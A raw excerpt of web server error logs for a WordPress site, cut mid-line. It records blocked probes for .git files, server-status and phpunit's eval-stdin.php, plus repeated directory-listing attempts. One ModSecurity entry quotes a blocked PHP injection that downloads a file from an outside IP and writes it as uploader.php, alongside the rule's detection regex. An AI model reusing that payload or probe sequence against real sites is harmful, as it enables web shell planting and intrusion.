20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:25:00.418407 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:25:25.179889 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:25:54.185262 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:26:17.119174 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:26:34.058728 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:26:53.895825 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/06/07 00:44:38 [error] 20394#20394: *488680 access forbidden by rule, client: 159.203.94.228, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/06/07 00:44:40 [error] 20394#20394: *488786 access forbidden by rule, client: 164.90.222.93, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/06/07 00:44:41 [error] 20394#20394: *488850 access forbidden by rule, client: 46.101.103.192, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/06/07 00:44:44 [error] 20394#20394: *488938 access forbidden by rule, client: 139.59.65.144, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/06/07 00:44:44 [error] 20395#20395: *488939 access forbidden by rule, client: 139.59.138.49, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/06/07 00:44:44 [error] 20395#20395: *488941 access forbidden by rule, client: 161.35.27.144, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Jun 07 00:44:45.669054 2023] [authz_core:error] [pid 694:tid 140308436141824] [client 165.22.74.203:51324] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jun 07 00:44:46.540971 2023] [authz_core:error] [pid 694:tid 140308680808192] [client 139.144.183.106:51334] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jun 07 00:44:48.953981 2023] [authz_core:error] [pid 781:tid 140308486498048] [client 165.22.120.216:51354] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jun 07 00:44:49.771963 2023] [authz_core:error] [pid 694:tid 140308570425088] [client 207.154.240.169:51362] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/06/07 00:44:49 [error] 20394#20394: *489011 access forbidden by rule, client: 165.22.74.203, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/06/07 00:44:50 [error] 20394#20394: *489019 access forbidden by rule, client: 139.144.183.106, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/06/07 00:44:54 [error] 20394#20394: *489042 access forbidden by rule, client: 165.22.120.216, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/06/07 00:44:54 [error] 20394#20394: *489048 access forbidden by rule, client: 207.154.240.169, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jun 07 18:34:40.311133 2023] [autoindex:error] [pid 1129:tid 140706148448000] [client 20.244.114.206:44724] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 08 06:57:39.667220 2023] [autoindex:error] [pid 21638:tid 140254572967680] [client 43.130.109.202:60962] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 09 04:49:08.245494 2023] [autoindex:error] [pid 27625:tid 140539366201088] [client 20.197.60.186:56582] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/06/10 02:47:17 [error] 26915#26915: *654084 access forbidden by rule, client: 36.90.11.154, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "www.investigacionperu.com" 2023/06/10 02:47:18 [error] 26914#26914: *654086 access forbidden by rule, client: 36.90.11.154, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 10 16:58:45.911728 2023] [:error] [pid 7374:tid 140678726067968] [client 45.140.90.74:38716] [client 45.140.90.74] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "30"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZITyFVOPkOVk6Dmc-XiGkQAAABY"] [Sat Jun 10 19:43:51.797723 2023] [autoindex:error] [pid 7374:tid 140678709282560] [client 34.29.118.132:52616] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:43:54.147028 2023] [autoindex:error] [pid 7374:tid 140678980564736] [client 34.29.118.132:52618] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:43:58.318582 2023] [autoindex:error] [pid 7376:tid 140678835173120] [client 34.29.118.132:52622] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:01.013178 2023] [autoindex:error] [pid 8635:tid 140678742853376] [client 34.29.118.132:52624] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:04.643007 2023] [autoindex:error] [pid 7376:tid 140678751246080] [client 34.29.118.132:52628] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:07.086322 2023] [autoindex:error] [pid 7375:tid 140678709282560] [client 34.29.118.132:52690] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:10.848668 2023] [autoindex:error] [pid 8635:tid 140678751246080] [client 34.29.118.132:52706] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:13.133753 2023] [autoindex:error] [pid 7376:tid 140678759638784] [client 34.29.118.132:52710] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:46.485672 2023] [autoindex:error] [pid 7375:tid 140678759638784] [client 34.29.118.132:52750] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:44:48.872403 2023] [autoindex:error] [pid 7375:tid 140678726067968] [client 34.29.118.132:52752] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:45:46.092550 2023] [autoindex:error] [pid 7376:tid 140678980564736] [client 34.29.118.132:52796] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:45:48.806406 2023] [autoindex:error] [pid 7375:tid 140678751246080] [client 34.29.118.132:52798] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:45:51.984894 2023] [autoindex:error] [pid 7375:tid 140678793209600] [client 34.29.118.132:52800] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:45:54.617116 2023] [autoindex:error] [pid 8635:tid 140678818387712] [client 34.29.118.132:52806] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:45:58.342246 2023] [autoindex:error] [pid 7375:tid 140678801602304] [client 34.29.118.132:52816] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:00.815122 2023] [autoindex:error] [pid 7375:tid 140678860351232] [client 34.29.118.132:52818] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:04.219723 2023] [autoindex:error] [pid 7375:tid 140678885529344] [client 34.29.118.132:52824] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:06.851439 2023] [autoindex:error] [pid 7375:tid 140678776424192] [client 34.29.118.132:52828] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:10.574342 2023] [autoindex:error] [pid 7376:tid 140678885529344] [client 34.29.118.132:52832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:13.285942 2023] [autoindex:error] [pid 7374:tid 140678851958528] [client 34.29.118.132:52840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:22.699264 2023] [autoindex:error] [pid 8635:tid 140678851958528] [client 34.29.118.132:52850] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:25.407101 2023] [autoindex:error] [pid 8635:tid 140678734460672] [client 34.29.118.132:52852] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:29.202604 2023] [autoindex:error] [pid 8635:tid 140678759638784] [client 34.29.118.132:52856] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:31.880299 2023] [autoindex:error] [pid 7375:tid 140678902314752] [client 34.29.118.132:52860] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:35.528053 2023] [autoindex:error] [pid 7375:tid 140678751246080] [client 34.29.118.132:52864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:38.429397 2023] [autoindex:error] [pid 8635:tid 140678742853376] [client 34.29.118.132:52872] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:42.087743 2023] [autoindex:error] [pid 7374:tid 140678742853376] [client 34.29.118.132:52882] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:45.027952 2023] [autoindex:error] [pid 8635:tid 140678843565824] [client 34.29.118.132:52894] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:49.130453 2023] [autoindex:error] [pid 8635:tid 140678793209600] [client 34.29.118.132:52908] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:52.561958 2023] [autoindex:error] [pid 8635:tid 140678751246080] [client 34.29.118.132:52928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:56.143732 2023] [autoindex:error] [pid 8635:tid 140678709282560] [client 34.29.118.132:52938] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:46:58.733121 2023] [autoindex:error] [pid 8635:tid 140678801602304] [client 34.29.118.132:52944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:02.678080 2023] [autoindex:error] [pid 8635:tid 140678826780416] [client 34.29.118.132:52952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:05.269323 2023] [autoindex:error] [pid 8635:tid 140678726067968] [client 34.29.118.132:52956] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:09.024862 2023] [autoindex:error] [pid 8635:tid 140678768031488] [client 34.29.118.132:52958] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:11.796355 2023] [autoindex:error] [pid 7374:tid 140678751246080] [client 34.29.118.132:52966] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:15.906855 2023] [autoindex:error] [pid 7374:tid 140678717675264] [client 34.29.118.132:52968] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 10 19:47:18.875245 2023] [autoindex:error] [pid 7376:tid 140678784816896] [client 34.29.118.132:52972] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jun 11 15:21:58.811925 2023] [autoindex:error] [pid 16847:tid 139998275823360] [client 20.219.216.230:37872] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jun 11 19:11:11.045637 2023] [:error] [pid 16526:tid 139998200289024] [client 43.130.135.10:52076] [client 43.130.135.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZIZinwAiidTbFFIUPK-O5wAAAIs"], referer: www.google.com [Mon Jun 12 14:23:59.220520 2023] [autoindex:error] [pid 9568:tid 140125849741056] [client 20.219.48.42:47604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jun 12 19:56:39.219001 2023] [autoindex:error] [pid 9682:tid 140125757421312] [client 41.216.188.168:56034] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Jun 13 07:14:51.903469 2023] [autoindex:error] [pid 11680:tid 140516121356032] [client 41.216.188.168:59286] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:14:53.396517 2023] [autoindex:error] [pid 11680:tid 140516163319552] [client 41.216.188.168:59288] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:14:54.888442 2023] [autoindex:error] [pid 10995:tid 140515995465472] [client 41.216.188.168:59292] AH01276: Cannot 